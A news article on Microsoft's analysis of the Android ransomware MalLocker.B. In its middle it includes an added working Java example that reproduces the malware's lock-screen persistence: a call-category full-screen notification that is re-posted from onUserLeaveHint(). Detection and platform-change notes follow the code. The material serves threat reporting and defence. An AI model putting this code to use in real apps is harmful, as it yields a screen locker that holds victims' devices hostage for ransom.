Microsoft has identified a new ransomware variant targeting Android devices that uses a variety of innovative techniques to get around the protections that Google has implemented to prevent malicious apps from taking over the home screen and making devices unusable.
The ransomware is a new iteration of a family that has been targeting Android for some time, and Microsoft researchers say the operators behind it have been updating and evolving the malware continuously. Known as AndroidOS/MalLocker.B, the new variant has the ability to respawn the ransom note overlaid on the home screen whenever the device owner tries to leave it, including by pressing the home button. Microsoft researchers said that the variant also carries a small, not-yet-activated machine-learning module that could eventually be used to tailor the ransom note to the victim's screen.
Traditionally, Android ransomware has abused a permission called SYSTEM_ALERT_WINDOW in order to draw a window on the home screen that can’t be removed. That permission is meant to be used by legitimate Android functions to display system alerts, but ransomware operators use it to display the ransom note indefinitely until the victim acquiesces and pays the ransom. Google made some changes to recent versions of Android to prevent malware from using this permission, but malware authors have adapted to employ other tactics.
“For example, some strains of ransomware abuse accessibility features, a method that could easily alarm users because accessibility is a special permission that requires users to go through several screens and accept a warning that the app will be able to monitor activity via accessibility services. Other ransomware families use infinite loops of drawing non-system windows, but in between drawing and redrawing, it’s possible for users to go to settings and uninstall the offending app,” Dinesh Venkatesan of Microsoft Defender Research wrote in a post on the new MalLocker.B ransomware.
But the variant that Microsoft identified does not use any of those techniques. Rather, it combines two ordinary Android features: a notification of the special "call" category, which demands the user's attention immediately, and an Activity callback, onUserLeaveHint(), that the system invokes when the ransom note is about to be sent to the background.
“The malware connects the dots and uses these two components to create a special type of notification that triggers the ransom screen via the callback,” Venkatesan said.
“The function onUserLeaveHint() is called whenever the malware screen is pushed to background, causing the in-call Activity to be automatically brought to the foreground. Recall that the malware hooked the RansomActivity intent with the notification that was created as a “call” type notification. This creates a chain of events that triggers the automatic pop-up of the ransomware screen without doing infinite redraw or posing as system window.”
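To make the chain of events concrete, the following Android example reproduces the two mechanisms described above: a "call"-category notification that carries a full-screen intent pointing at an Activity, and that Activity's onUserLeaveHint() override re-posting the notification so the system brings it straight back to the foreground. This is an added illustration written for this page, not code recovered from MalLocker.B or published by Microsoft; the class name RansomActivity is borrowed from the quoted text, while the channel id, notification id, and title are invented for the example.

```java
// Added illustration of the notification/callback chain the article describes.
// Written for this page; NOT MalLocker.B's code. Channel id, notification id and
// title are made up. AndroidManifest.xml must declare
// android.permission.USE_FULL_SCREEN_INTENT (required since Android 10) and
// register RansomActivity for this to run.
import android.app.Activity;
import android.app.Notification;
import android.app.NotificationChannel;
import android.app.NotificationManager;
import android.app.PendingIntent;
import android.content.Context;
import android.content.Intent;
import android.os.Bundle;

public class RansomActivity extends Activity {
    private static final String CHANNEL_ID = "incoming_call"; // hypothetical name
    private static final int NOTIFICATION_ID = 1;              // hypothetical id

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        // A real app would inflate the ransom-note layout here with setContentView().
    }

    // Component 1: a notification in the "call" category whose full-screen intent
    // targets this Activity. Because the notification is marked high priority and
    // categorised as a call, the system launches the Activity itself rather than
    // showing a dismissable banner, which is the "demands attention" behaviour.
    static void postCallNotification(Context ctx) {
        NotificationManager nm =
                (NotificationManager) ctx.getSystemService(Context.NOTIFICATION_SERVICE);
        nm.createNotificationChannel(new NotificationChannel(
                CHANNEL_ID, "Calls", NotificationManager.IMPORTANCE_HIGH));

        Intent launch = new Intent(ctx, RansomActivity.class)
                .addFlags(Intent.FLAG_ACTIVITY_NEW_TASK | Intent.FLAG_ACTIVITY_CLEAR_TOP);
        PendingIntent fullScreen = PendingIntent.getActivity(
                ctx, 0, launch,
                PendingIntent.FLAG_UPDATE_CURRENT | PendingIntent.FLAG_IMMUTABLE);

        Notification n = new Notification.Builder(ctx, CHANNEL_ID)
                .setSmallIcon(android.R.drawable.sym_call_incoming)
                .setContentTitle("Incoming call")           // invented title
                .setCategory(Notification.CATEGORY_CALL)
                .setFullScreenIntent(fullScreen, true)      // highPriority = true
                .setOngoing(true)
                .build();
        nm.notify(NOTIFICATION_ID, n);
    }

    // Component 2: the framework calls onUserLeaveHint() whenever the user
    // navigates away (Home button, recents). Re-posting the notification here
    // fires the full-screen intent again, so the Activity returns to the
    // foreground without an infinite redraw loop or a SYSTEM_ALERT_WINDOW overlay.
    @Override
    protected void onUserLeaveHint() {
        super.onUserLeaveHint();
        postCallNotification(this);
    }
}
```

Two practical notes. First, the full-screen intent is a legitimate API (incoming-call and alarm apps rely on it), so its presence alone is not malicious; what distinguishes this pattern in a decompiled APK is the combination of USE_FULL_SCREEN_INTENT, CATEGORY_CALL and an onUserLeaveHint() override that re-posts the same notification. Second, the permission landscape has moved since this report: Android 10 made USE_FULL_SCREEN_INTENT a declared permission, and Android 14 further restricts it for apps that are not calling or alarm apps, so the same code is less effective on current devices.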
Along with those techniques, the MalLocker.B ransomware variant also includes some code that has been forked from an open-source machine-learning library, one that legitimate apps use to automatically resize and crop images to fit specific screen sizes. The module isn't yet active in the ransomware code, but it could add new capabilities once it is wired in.
“In the case of this ransomware, using the model would ensure that its ransom note—typically fake police notice or explicit images supposedly found on the device—would appear less contrived and more believable, increasing the chances of the user paying for the ransom,” Venkatesan said.
“The library that uses tinyML is not yet wired to the malware’s functionalities, but its presence in the malware code indicates the intention to do so in future variants.”